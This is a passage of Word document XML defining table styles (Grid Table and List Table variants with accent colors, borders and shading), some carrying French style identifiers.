      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable3-Accent2">
    <w:name w:val="Grid Table 3 - Accent 2"/>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customStyle="1" w:styleId="GridTable3-Accent3">
    <w:name w:val="Grid Table 3 - Accent 3"/>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customStyle="1" w:styleId="GridTable3-Accent4">
    <w:name w:val="Grid Table 3 - Accent 4"/>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customStyle="1" w:styleId="GridTable3-Accent5">
    <w:name w:val="Grid Table 3 - Accent 5"/>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customStyle="1" w:styleId="GridTable3-Accent6">
    <w:name w:val="Grid Table 3 - Accent 6"/>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styleId="TableauGrille4">
    <w:name w:val="Grid Table 4"/>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4-Accent1">
    <w:name w:val="Grid Table 4 - Accent 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b/>
        <w:color w:val="FFFFFF"/>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5D8AC2" w:themeFill="accent1" w:themeFillTint="EA"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="404040"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="4F81BD"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auto" w:fill="DCE6F2" w:themeFill="accent1" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DCE6F2" w:themeFill="accent1" w:themeFillTint="32"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable4-Accent2">
    <w:name w:val="Grid Table 4 - Accent 2"/>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b/>
        <w:color w:val="FFFFFF"/>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D99695" w:themeFill="accent2" w:themeFillTint="97"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="404040"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="C0504D"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customStyle="1" w:styleId="GridTable4-Accent3">
    <w:name w:val="Grid Table 4 - Accent 3"/>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b/>
        <w:color w:val="FFFFFF"/>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auto" w:fill="9ABB59" w:themeFill="accent3" w:themeFillTint="FE"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="404040"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="9BBB59"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customStyle="1" w:styleId="GridTable4-Accent4">
    <w:name w:val="Grid Table 4 - Accent 4"/>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b/>
        <w:color w:val="FFFFFF"/>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auto" w:fill="B2A1C6" w:themeFill="accent4" w:themeFillTint="9A"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="404040"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="8064A2"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customStyle="1" w:styleId="GridTable4-Accent5">
    <w:name w:val="Grid Table 4 - Accent 5"/>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customStyle="1" w:styleId="GridTable4-Accent6">
    <w:name w:val="Grid Table 4 - Accent 6"/>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styleId="TableauGrille5Fonc">
    <w:name w:val="Grid Table 5 Dark"/>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="8064A2" w:themeFill="accent4"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="4BACC6" w:themeFill="accent5"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="FFFFFF" w:themeColor="light1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>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eauGrille6Couleur">
    <w:name w:val="Grid Table 6 Colorfu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color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="A6BFDD" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="9ABB59" w:themeColor="accent3" w:themeTint="FE" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE9D8" w:themeFill="accent6" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauGrille7Couleur">
    <w:name w:val="Grid Table 7 Colorfu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auto"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auto"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color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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b/>
        <w:color w:val="A6BFDD" w:themeColor="accent1" w:themeTint="80"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A6BFDD" w:themeColor="accent1" w:themeTint="80"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i/>
        <w:color w:val="A6BFDD" w:themeColor="accent1" w:themeTint="80"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color w:val="A6BFDD" w:themeColor="accent1" w:themeTint="80" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>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auto" w:fill="FFFFFF"/>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color w:val="D99695" w:themeColor="accent2" w:themeTint="97" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="9ABB59" w:themeColor="accent3" w:themeTint="FE" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>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9ABB59" w:themeColor="accent3" w:themeTint="FE" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="9ABB59" w:themeColor="accent3" w:themeTint="FE" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>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color w:val="9ABB59" w:themeColor="accent3" w:themeTint="FE" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>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auto" w:fill="FFFFFF"/>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color w:val="B2A1C6" w:themeColor="accent4" w:themeTint="9A" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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b/>
        <w:color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>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266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>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color w:val="266779" w:themeColor="accent5" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto"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b/>
        <w:color w:val="B15407" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
          <w:right w:val="none" w:sz="4" w:space="0" w:color="000000"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="light1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="B15407" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>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B15407" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:color w:val="B15407" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="none" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>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color w:val="B15407" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE9D8" w:themeFill="accent6" w:themeFillTint="34"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:color w:val="B15407" w:themeColor="accent6" w:themeShade="95"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauListe1Clair">
    <w:name w:val="List Table 1 Light"/>
    <w:uiPriority w:val="99"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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eauListe2">
    <w:name w:val="List Table 2"/>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ListTable2-Accent1">
    <w:name w:val="List Table 2 - Accent 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color w:val="404040"/>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D2DFEE" w:themeFill="accent1" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D2DFEE" w:themeFill="accent1" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable2-Accent2">
    <w:name w:val="List Table 2 - Accent 2"/>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color w:val="404040"/>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EFD2D2" w:themeFill="accent2" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFD2D2" w:themeFill="accent2" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable2-Accent3">
    <w:name w:val="List Table 2 - Accent 3"/>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color w:val="404040"/>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E5EED5" w:themeFill="accent3" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5EED5" w:themeFill="accent3" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable2-Accent4">
    <w:name w:val="List Table 2 - Accent 4"/>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color w:val="404040"/>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DFD8E7" w:themeFill="accent4" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DFD8E7" w:themeFill="accent4" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable2-Accent5">
    <w:name w:val="List Table 2 - Accent 5"/>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color w:val="404040"/>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D1EAF0" w:themeFill="accent5" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D1EAF0" w:themeFill="accent5" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable2-Accent6">
    <w:name w:val="List Table 2 - Accent 6"/>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color w:val="404040"/>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FDE4D0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FDE4D0" w:themeFill="accent6" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauListe3">
    <w:name w:val="List Table 3"/>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F81BD" w:themeColor="accent1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>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C0504D" w:themeColor="accent2"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="C0504D" w:themeColor="accent2"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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BBB59" w:themeColor="accent3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="9BBB59" w:themeColor="accent3"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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8064A2" w:themeColor="accent4"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="8064A2" w:themeColor="accent4"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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BACC6" w:themeColor="accent5"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="4BACC6" w:themeColor="accent5"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>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79646" w:themeColor="accent6"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="F79646" w:themeColor="accent6"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableauListe4">
    <w:name w:val="List Table 4"/>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ListTable4-Accent1">
    <w:name w:val="List Table 4 - Accent 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D2DFEE" w:themeFill="accent1" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D2DFEE" w:themeFill="accent1" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable4-Accent2">
    <w:name w:val="List Table 4 - Accent 2"/>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EFD2D2" w:themeFill="accent2" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:color w:val="404040"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFD2D2" w:themeFill="accent2" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable4-Accent3">
    <w:name w:val="List Table 4 - Accent 3"/>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E5EED5" w:themeFill="accent3" w:themeFillTint="40"/>
      </w:tcPr>
    </w:tblStylePr>
